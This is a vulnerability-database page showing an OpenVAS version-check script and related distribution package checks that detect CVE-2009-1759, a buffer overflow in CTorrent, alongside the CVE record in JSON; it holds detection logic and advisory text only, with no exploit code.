Search...

CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability

2009-06-01T00:00:00

ID OPENVAS:1361412562310900557
Type openvas
Reporter Copyright (C) 2009 SecPod
Modified 2020-04-27T00:00:00

Description

The host is installed with CTorrent/Enhanced CTorrent and is prone to a Buffer Overflow Vulnerability.

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
#
# CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability
#
# Authors:
# Nikita MR &lt;rnikita@secpod.com&gt;
#
# Copyright:
# Copyright (C) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.900557");
  script_version("2020-04-27T09:00:11+0000");
  script_tag(name:"last_modification", value:"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)");
  script_tag(name:"creation_date", value:"2009-06-01 09:35:57 +0200 (Mon, 01 Jun 2009)");
  script_tag(name:"cvss_base", value:"9.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_cve_id("CVE-2009-1759");
  script_bugtraq_id(34584);
  script_name("CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability");
  script_xref(name:"URL", value:"http://secunia.com/advisories/34752");
  script_xref(name:"URL", value:"http://www.milw0rm.com/exploits/8470");
  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/49959");

  script_tag(name:"qod_type", value:"executable_version");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2009 SecPod");
  script_family("Buffer overflow");
  script_dependencies("secpod_ctorrent_detect.nasl");
  script_mandatory_keys("CTorrent/CTorrent_or_Enhanced/Installed");
  script_tag(name:"impact", value:"Attackers can exploit this issue by execute arbitrary code via
specially crafted torrent files and can cause denial of service.");
  script_tag(name:"affected", value:"CTorrent version 1.3.4 on Linux.
Enhanced CTorrent version 3.3.2 and prior on Linux.");
  script_tag(name:"insight", value:"A stack based buffer overflow is due to a boundary error within
the function 'btFiles::BuildFromMI()' in btfiles.cpp while processing torrent
files containing a long path.");
  script_tag(name:"solution", value:"Apply the appropriate patch.");
  script_tag(name:"summary", value:"The host is installed with CTorrent/Enhanced CTorrent and is
prone to a Buffer Overflow Vulnerability.");
  script_tag(name:"solution_type", value:"VendorFix");
  script_xref(name:"URL", value:"http://sourceforge.net/p/dtorrent/bugs/14/");
  script_xref(name:"URL", value:"http://sourceforge.net/p/dtorrent/code/HEAD/tree");
  exit(0);
}


include("version_func.inc");

ctorrentVer = get_kb_item("CTorrent/Ver");
if(ctorrentVer != NULL)
{
  if(version_is_equal(version:ctorrentVer, test_version:"1.3.4"))
  {
    report = report_fixed_ver(installed_version:ctorrentVer, vulnerable_range:"Equal to 1.3.4");
    security_message(port: 0, data: report);
    exit(0);
  }
}

ectorrentVer = get_kb_item("Enhanced/CTorrent/Ver");
if(ectorrentVer != NULL)
{
  if(version_is_less_equal(version:ectorrentVer, test_version:"3.3.2")){
    report = report_fixed_ver(installed_version:ectorrentVer, vulnerable_range:"Less than or equal to 3.3.2");
    security_message(port: 0, data: report);
    exit(0);
  }
}

exit(99);

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310900557", "type": "openvas", "bulletinFamily": "scanner", "title": "CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability", "description": "The host is installed with CTorrent/Enhanced CTorrent and is\nprone to a Buffer Overflow Vulnerability.", "published": "2009-06-01T00:00:00", "modified": "2020-04-27T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900557", "reporter": "Copyright (C) 2009 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/49959", "http://secunia.com/advisories/34752", "http://sourceforge.net/p/dtorrent/bugs/14/", "http://www.milw0rm.com/exploits/8470", "http://sourceforge.net/p/dtorrent/code/HEAD/tree"], "cvelist": ["CVE-2009-1759"], "lastseen": "2020-04-29T22:26:30", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1759"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231064252", "OPENVAS:136141256231064730", "OPENVAS:136141256231064732", "OPENVAS:64252", "OPENVAS:64730", "OPENVAS:900557", "OPENVAS:1361412562310121070", "OPENVAS:64732", "OPENVAS:66158", "OPENVAS:136141256231066158"]}, {"type": "exploitdb", "idList": ["EDB-ID:8470"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1817-1:FA2AD"]}, {"type": "gentoo", "idList": ["GLSA-201311-11"]}, {"type": "nessus", "idList": ["FEDORA_2009-8969.NASL", "FEDORA_2009-8897.NASL", "FREEBSD_PKG_83D7D149B96511DEA5150022156E8794.NASL", "GENTOO_GLSA-201311-11.NASL", "DEBIAN_DSA-1817.NASL"]}, {"type": "freebsd", "idList": ["83D7D149-B965-11DE-A515-0022156E8794"]}, {"type": "fedora", "idList": ["FEDORA:0A79010F877", "FEDORA:4FC6A10F8B4"]}], "modified": "2020-04-29T22:26:30", "rev": 2}, "score": {"value": 8.5, "vector": "NONE", "modified": "2020-04-29T22:26:30", "rev": 2}, "vulnersScore": 8.5}, "pluginID": "1361412562310900557", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900557\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-06-01 09:35:57 +0200 (Mon, 01 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_name(\"CTorrent/Enhanced CTorrent Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34752\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/8470\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/49959\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_ctorrent_detect.nasl\");\n script_mandatory_keys(\"CTorrent/CTorrent_or_Enhanced/Installed\");\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue by execute arbitrary code via\nspecially crafted torrent files and can cause denial of service.\");\n script_tag(name:\"affected\", value:\"CTorrent version 1.3.4 on Linux.\nEnhanced CTorrent version 3.3.2 and prior on Linux.\");\n script_tag(name:\"insight\", value:\"A stack based buffer overflow is due to a boundary error within\nthe function 'btFiles::BuildFromMI()' in btfiles.cpp while processing torrent\nfiles containing a long path.\");\n script_tag(name:\"solution\", value:\"Apply the appropriate patch.\");\n script_tag(name:\"summary\", value:\"The host is installed with CTorrent/Enhanced CTorrent and is\nprone to a Buffer Overflow Vulnerability.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://sourceforge.net/p/dtorrent/bugs/14/\");\n script_xref(name:\"URL\", value:\"http://sourceforge.net/p/dtorrent/code/HEAD/tree\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nctorrentVer = get_kb_item(\"CTorrent/Ver\");\nif(ctorrentVer != NULL)\n{\n if(version_is_equal(version:ctorrentVer, test_version:\"1.3.4\"))\n {\n report = report_fixed_ver(installed_version:ctorrentVer, vulnerable_range:\"Equal to 1.3.4\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nectorrentVer = get_kb_item(\"Enhanced/CTorrent/Ver\");\nif(ectorrentVer != NULL)\n{\n if(version_is_less_equal(version:ectorrentVer, test_version:\"3.3.2\")){\n report = report_fixed_ver(installed_version:ectorrentVer, vulnerable_range:\"Less than or equal to 3.3.2\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Buffer overflow"}

{"cve": [{"lastseen": "2020-10-03T11:54:13", "description": "Stack-based buffer overflow in the btFiles::BuildFromMI function (trunk/btfiles.cpp) in Enhanced CTorrent (aka dTorrent) 3.3.2 and probably earlier, and CTorrent 1.3.4, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a Torrent file containing a long path.", "edition": 3, "cvss3": {}, "published": "2009-05-22T11:52:00", "title": "CVE-2009-1759", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1759"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:rahul:dtorrent:3.2.0", "cpe:/a:rahul:dtorrent:3.3.1", "cpe:/a:rahul:dtorrent:3.3.2", "cpe:/a:rahul:dtorrent:3.3.0", "cpe:/a:rahul:ctorrent:1.3.4"], "id": "CVE-2009-1759", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1759", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:rahul:dtorrent:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:rahul:dtorrent:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:rahul:ctorrent:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:rahul:dtorrent:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:rahul:dtorrent:3.3.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:36:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "Gentoo Linux Local Security Checks GLSA 201311-11", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121070", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121070", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201311-11", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201311-11.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121070\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:18 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201311-11\");\n script_tag(name:\"insight\", value:\"CTorrent contains a stack-based buffer overflow in the btFiles::BuildFromMI function in trunk/btfiles.cpp.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201311-11\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201311-11\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-p2p/ctorrent\", unaffected: make_list(\"ge 3.3.2-r1\"), vulnerable: make_list(\"lt 3.3.2-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:39:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8969.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064732", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064732", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8969 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8969.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8969 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity update, fixes a stack-based buffer overflow (CVE-2009-1759)\n\nChangeLog:\n\n* Fri Aug 21 2009 Dominik 'Rathann' Mierzejewski 1.3.4-7.dnh3.3.2\n- fixed stack-based buffer overflow (CVE-2009-1759, RHBZ #501813)\n- update to 3.3.2 patch\n- improve summary: and description\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update ctorrent' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8969\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8969.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64732\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8969 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501813\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ctorrent\", rpm:\"ctorrent~1.3.4~7.dnh3.3.2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ctorrent-debuginfo\", rpm:\"ctorrent-debuginfo~1.3.4~7.dnh3.3.2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8969.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64732", "href": "http://plugins.openvas.org/nasl.php?oid=64732", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8969 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8969.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8969 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity update, fixes a stack-based buffer overflow (CVE-2009-1759)\n\nChangeLog:\n\n* Fri Aug 21 2009 Dominik 'Rathann' Mierzejewski 1.3.4-7.dnh3.3.2\n- fixed stack-based buffer overflow (CVE-2009-1759, RHBZ #501813)\n- update to 3.3.2 patch\n- improve summary: and description\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update ctorrent' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8969\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8969.\";\n\n\n\nif(description)\n{\n script_id(64732);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8969 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=501813\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ctorrent\", rpm:\"ctorrent~1.3.4~7.dnh3.3.2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ctorrent-debuginfo\", rpm:\"ctorrent-debuginfo~1.3.4~7.dnh3.3.2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:136141256231066158", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066158", "type": "openvas", "title": "FreeBSD Ports: ctorrent", "sourceData": "#\n#VID 83d7d149-b965-11de-a515-0022156e8794\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 83d7d149-b965-11de-a515-0022156e8794\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: ctorrent\n\nCVE-2009-1759\nStack-based buffer overflow in the btFiles::BuildFromMI function\n(trunk/btfiles.cpp) in Enhanced CTorrent (aka dTorrent) 3.3.2 and\nprobably earlier, and CTorrent 1.3.4, allows remote attackers to cause\na denial of service (crash) and possibly execute arbitrary code via a\nTorrent file containing a long path.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://sourceforge.net/tracker/?func=detail&aid=2782875&group_id=202532&atid=981959\nhttp://www.vuxml.org/freebsd/83d7d149-b965-11de-a515-0022156e8794.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66158\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: ctorrent\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"ctorrent\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.3.2_2\")<0) {\n txt += 'Package ctorrent version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "description": "The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8897.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064730", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064730", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8897 (ctorrent)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8897.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8897 (ctorrent)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity update, fixes a stack-based buffer overflow (CVE-2009-1759).\n\nChangeLog:\n\n* Fri Aug 21 2009 Dominik 'Rathann' Mierzejewski 1.3.4-10.dnh3.3.2\n- fixed stack-based buffer overflow (CVE-2009-1759, RHBZ #501813)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update ctorrent' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8897\";\ntag_summary = \"The remote host is missing an update to ctorrent\nannounced via advisory FEDORA-2009-8897.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64730\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-1759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-8897 (ctorrent)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security 